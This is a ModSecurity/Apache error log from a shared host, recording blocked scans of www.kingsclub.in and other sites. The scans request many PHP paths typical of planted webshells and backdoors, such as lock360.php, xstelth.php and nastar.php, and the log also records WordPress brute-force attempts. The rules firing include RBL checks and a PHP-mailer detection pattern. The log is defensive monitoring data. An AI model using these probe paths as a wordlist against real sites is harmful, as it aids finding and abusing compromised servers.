[Tue May 26 19:15:17.058943 2026] [security2:error] [pid 26857:tid 26988] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/testphp.php"] [unique_id "ahWj7dfoqtHEG_e9i6GrsAAAhgI"]
[Tue May 26 19:15:17.302812 2026] [security2:error] [pid 26857:tid 26982] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/build.php"] [unique_id "ahWj7dfoqtHEG_e9i6GrwAAAt3w"]
[Tue May 26 19:15:17.302999 2026] [security2:error] [pid 26857:tid 27037] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/build.php"] [unique_id "ahWj7dfoqtHEG_e9i6GrwAAAt3w"]
[Tue May 26 19:15:17.404851 2026] [security2:error] [pid 26857:tid 26867] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/file6.php"] [unique_id "ahWj7dfoqtHEG_e9i6GrxwAApAk"]
[Tue May 26 19:15:17.405047 2026] [security2:error] [pid 26857:tid 27018] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/file6.php"] [unique_id "ahWj7dfoqtHEG_e9i6GrxwAApAk"]
[Tue May 26 19:15:17.502689 2026] [security2:error] [pid 26857:tid 26876] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/cabs.php"] [unique_id "ahWj7dfoqtHEG_e9i6GrzQAA_xI"]
[Tue May 26 19:15:17.502857 2026] [security2:error] [pid 26857:tid 27109] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/cabs.php"] [unique_id "ahWj7dfoqtHEG_e9i6GrzQAA_xI"]
[Tue May 26 19:15:17.600959 2026] [security2:error] [pid 26857:tid 26873] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/file15.php"] [unique_id "ahWj7dfoqtHEG_e9i6Gr0AAA5g8"]
[Tue May 26 19:15:17.601146 2026] [security2:error] [pid 26857:tid 27084] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/file15.php"] [unique_id "ahWj7dfoqtHEG_e9i6Gr0AAA5g8"]
[Tue May 26 19:15:17.691526 2026] [security2:error] [pid 26857:tid 26872] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/lock360.php"] [unique_id "ahWj7dfoqtHEG_e9i6Gr0wAAuQ4"]
[Tue May 26 19:15:17.691734 2026] [security2:error] [pid 26857:tid 27039] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/lock360.php"] [unique_id "ahWj7dfoqtHEG_e9i6Gr0wAAuQ4"]
[Tue May 26 19:15:17.796424 2026] [security2:error] [pid 26857:tid 26875] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/security.php"] [unique_id "ahWj7dfoqtHEG_e9i6Gr2wAA6hE"]
[Tue May 26 19:15:17.796580 2026] [security2:error] [pid 26857:tid 27088] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/security.php"] [unique_id "ahWj7dfoqtHEG_e9i6Gr2wAA6hE"]
[Tue May 26 19:15:17.797136 2026] [security2:error] [pid 26857:tid 27114] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWj7dfoqtHEG_e9i6GrwwAAAQQ"]
[Tue May 26 19:15:17.936939 2026] [security2:error] [pid 26857:tid 26882] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/title.php"] [unique_id "ahWj7dfoqtHEG_e9i6Gr5QAAlhg"]
[Tue May 26 19:15:17.937126 2026] [security2:error] [pid 26857:tid 27004] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/title.php"] [unique_id "ahWj7dfoqtHEG_e9i6Gr5QAAlhg"]
[Tue May 26 19:15:18.120102 2026] [security2:error] [pid 26857:tid 26985] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/N1.php"] [unique_id "ahWj7tfoqtHEG_e9i6Gr7AAA-H8"]
[Tue May 26 19:15:18.120379 2026] [security2:error] [pid 26857:tid 27102] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/N1.php"] [unique_id "ahWj7tfoqtHEG_e9i6Gr7AAA-H8"]
[Tue May 26 19:15:18.211301 2026] [security2:error] [pid 26857:tid 26884] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/.well-known/nastar.php"] [unique_id "ahWj7tfoqtHEG_e9i6Gr9AAAhho"]
[Tue May 26 19:15:18.211553 2026] [security2:error] [pid 26857:tid 26988] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/.well-known/nastar.php"] [unique_id "ahWj7tfoqtHEG_e9i6Gr9AAAhho"]
[Tue May 26 19:15:18.590447 2026] [security2:error] [pid 26857:tid 26890] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/no1.php"] [unique_id "ahWj7tfoqtHEG_e9i6GsDQAAkSA"]
[Tue May 26 19:15:18.590637 2026] [security2:error] [pid 26857:tid 26999] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/no1.php"] [unique_id "ahWj7tfoqtHEG_e9i6GsDQAAkSA"]
[Tue May 26 19:15:18.686202 2026] [security2:error] [pid 26857:tid 26888] [remote 74.249.212.138:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/\\\\.[a-z0-9]{4}\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "784"] [id "900080"] [msg "PHP Mailer Access Attempt"] [hostname "www.kingsclub.in"] [uri "/.sghb.php"] [unique_id "ahWj7tfoqtHEG_e9i6GsEQABAR4"]
[Tue May 26 19:15:18.686442 2026] [security2:error] [pid 26857:tid 27111] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "406"] [hostname "www.kingsclub.in"] [uri "/.sghb.php"] [unique_id "ahWj7tfoqtHEG_e9i6GsEQABAR4"]
[Tue May 26 19:15:18.799600 2026] [security2:error] [pid 26857:tid 26901] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/jp.php"] [unique_id "ahWj7tfoqtHEG_e9i6GsGwAA1is"]
[Tue May 26 19:15:18.799939 2026] [security2:error] [pid 26857:tid 27068] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/jp.php"] [unique_id "ahWj7tfoqtHEG_e9i6GsGwAA1is"]
[Tue May 26 19:15:18.899752 2026] [security2:error] [pid 26857:tid 26886] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/f35.php"] [unique_id "ahWj7tfoqtHEG_e9i6GsIgAAxBw"]
[Tue May 26 19:15:18.900075 2026] [security2:error] [pid 26857:tid 27050] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/f35.php"] [unique_id "ahWj7tfoqtHEG_e9i6GsIgAAxBw"]
[Tue May 26 19:15:18.989370 2026] [security2:error] [pid 26857:tid 26902] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/xa.php"] [unique_id "ahWj7tfoqtHEG_e9i6GsKQAAuyw"]
[Tue May 26 19:15:18.989674 2026] [security2:error] [pid 26857:tid 27041] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/xa.php"] [unique_id "ahWj7tfoqtHEG_e9i6GsKQAAuyw"]
[Tue May 26 19:15:19.551085 2026] [security2:error] [pid 26857:tid 26898] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/wp-load.php"] [unique_id "ahWj79foqtHEG_e9i6GsRwAA4ig"]
[Tue May 26 19:15:19.553775 2026] [security2:error] [pid 26857:tid 27080] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/wp-load.php"] [unique_id "ahWj79foqtHEG_e9i6GsRwAA4ig"]
[Tue May 26 19:15:19.679536 2026] [security2:error] [pid 26857:tid 26908] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/xwpg.php"] [unique_id "ahWj79foqtHEG_e9i6GsSwAAzTI"]
[Tue May 26 19:15:19.679721 2026] [security2:error] [pid 26857:tid 27059] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/xwpg.php"] [unique_id "ahWj79foqtHEG_e9i6GsSwAAzTI"]
[Tue May 26 19:15:19.762054 2026] [security2:error] [pid 26857:tid 26995] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWj79foqtHEG_e9i6GsOAAAAI0"]
[Tue May 26 19:15:19.915213 2026] [security2:error] [pid 26857:tid 26910] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/a5.php"] [unique_id "ahWj79foqtHEG_e9i6GsWAAAmDQ"]
[Tue May 26 19:15:19.915389 2026] [security2:error] [pid 26857:tid 27006] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/a5.php"] [unique_id "ahWj79foqtHEG_e9i6GsWAAAmDQ"]
[Tue May 26 19:15:20.028412 2026] [autoindex:error] [pid 26857:tid 26917] [remote 74.249.212.138:0] AH01276: Cannot serve directory /home2/kingsr2o/public_html/wp-includes/assets/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:15:20.029608 2026] [security2:error] [pid 26857:tid 27068] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.kingsclub.in"] [uri "/cgi-sys/403.html"] [unique_id "ahWj8NfoqtHEG_e9i6GsXAAA1js"]
[Tue May 26 19:15:20.120301 2026] [security2:error] [pid 26857:tid 26916] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/dropdown.php"] [unique_id "ahWj8NfoqtHEG_e9i6GsYwAA2Do"]
[Tue May 26 19:15:20.120476 2026] [security2:error] [pid 26857:tid 27070] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/dropdown.php"] [unique_id "ahWj8NfoqtHEG_e9i6GsYwAA2Do"]
[Tue May 26 19:15:20.347459 2026] [security2:error] [pid 26857:tid 26913] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/ddd.php"] [unique_id "ahWj8NfoqtHEG_e9i6GsbgABADc"]
[Tue May 26 19:15:20.347594 2026] [security2:error] [pid 26857:tid 27110] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/ddd.php"] [unique_id "ahWj8NfoqtHEG_e9i6GsbgABADc"]
[Tue May 26 19:15:20.515906 2026] [autoindex:error] [pid 26857:tid 26915] [remote 74.249.212.138:0] AH01276: Cannot serve directory /home2/kingsr2o/public_html/wp-admin/css/colors/sunrise/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:15:20.516707 2026] [security2:error] [pid 26857:tid 27057] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.kingsclub.in"] [uri "/cgi-sys/403.html"] [unique_id "ahWj8NfoqtHEG_e9i6GsdQAAyzk"]
[Tue May 26 19:15:20.601337 2026] [security2:error] [pid 26857:tid 26930] [remote 18.190.7.192:50802] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWj8NfoqtHEG_e9i6GsbwAArUg"]
[Tue May 26 19:15:20.806990 2026] [security2:error] [pid 26857:tid 26918] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/jj.php"] [unique_id "ahWj8NfoqtHEG_e9i6GsiwAAkDw"]
[Tue May 26 19:15:20.807171 2026] [security2:error] [pid 26857:tid 26998] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/jj.php"] [unique_id "ahWj8NfoqtHEG_e9i6GsiwAAkDw"]
[Tue May 26 19:15:20.854971 2026] [security2:error] [pid 26857:tid 26929] [remote 18.190.7.192:50802] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWj8NfoqtHEG_e9i6GsigAAiEc"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:15:21.091735 2026] [security2:error] [pid 26857:tid 26934] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/ccc.php"] [unique_id "ahWj8dfoqtHEG_e9i6GsmQAAzkw"]
[Tue May 26 19:15:21.091946 2026] [security2:error] [pid 26857:tid 27060] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/ccc.php"] [unique_id "ahWj8dfoqtHEG_e9i6GsmQAAzkw"]
[Tue May 26 19:15:21.335240 2026] [security2:error] [pid 26857:tid 26941] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/wp-link-snpm.php"] [unique_id "ahWj8dfoqtHEG_e9i6GsowAAzFM"]
[Tue May 26 19:15:21.335397 2026] [security2:error] [pid 26857:tid 27058] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/wp-link-snpm.php"] [unique_id "ahWj8dfoqtHEG_e9i6GsowAAzFM"]
[Tue May 26 19:15:21.381888 2026] [security2:error] [pid 26857:tid 27078] [client 130.51.23.23:57661] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWj8NfoqtHEG_e9i6GsdwAAAOA"], referer: https://www.cagmedya.com/web-tasarim-projelerinde-etkili-proje-yonetimi/
[Tue May 26 19:15:21.560471 2026] [security2:error] [pid 26857:tid 26937] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/4.php"] [unique_id "ahWj8dfoqtHEG_e9i6GstgAAv08"]
[Tue May 26 19:15:21.560659 2026] [security2:error] [pid 26857:tid 27045] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/4.php"] [unique_id "ahWj8dfoqtHEG_e9i6GstgAAv08"]
[Tue May 26 19:15:21.776548 2026] [security2:error] [pid 26857:tid 26996] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWj8dfoqtHEG_e9i6GsqQAAAI4"]
[Tue May 26 19:15:21.898422 2026] [security2:error] [pid 26857:tid 26945] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/xstelth.php"] [unique_id "ahWj8dfoqtHEG_e9i6GsxQAA6lc"]
[Tue May 26 19:15:21.898642 2026] [security2:error] [pid 26857:tid 27088] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/xstelth.php"] [unique_id "ahWj8dfoqtHEG_e9i6GsxQAA6lc"]
[Tue May 26 19:15:23.165610 2026] [security2:error] [pid 26857:tid 26957] [remote 74.7.241.58:39072] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWj89foqtHEG_e9i6GtDwAAxWM"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/rehobothindependentcare.com
[Tue May 26 19:15:23.853993 2026] [security2:error] [pid 26857:tid 27112] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWj89foqtHEG_e9i6GtHwAAAQI"]
[Tue May 26 19:15:25.948527 2026] [security2:error] [pid 26857:tid 27086] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWj9dfoqtHEG_e9i6GtlgAAAOg"]
[Tue May 26 19:15:26.096671 2026] [security2:error] [pid 26857:tid 26983] [remote 216.73.216.30:34910] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWj9tfoqtHEG_e9i6GtrQAA1X0"]
[Tue May 26 19:15:27.311902 2026] [security2:error] [pid 26857:tid 26990] [client 31.57.184.107:57934] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cliffengg.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahWj99foqtHEG_e9i6Gt5wAAAIg"]
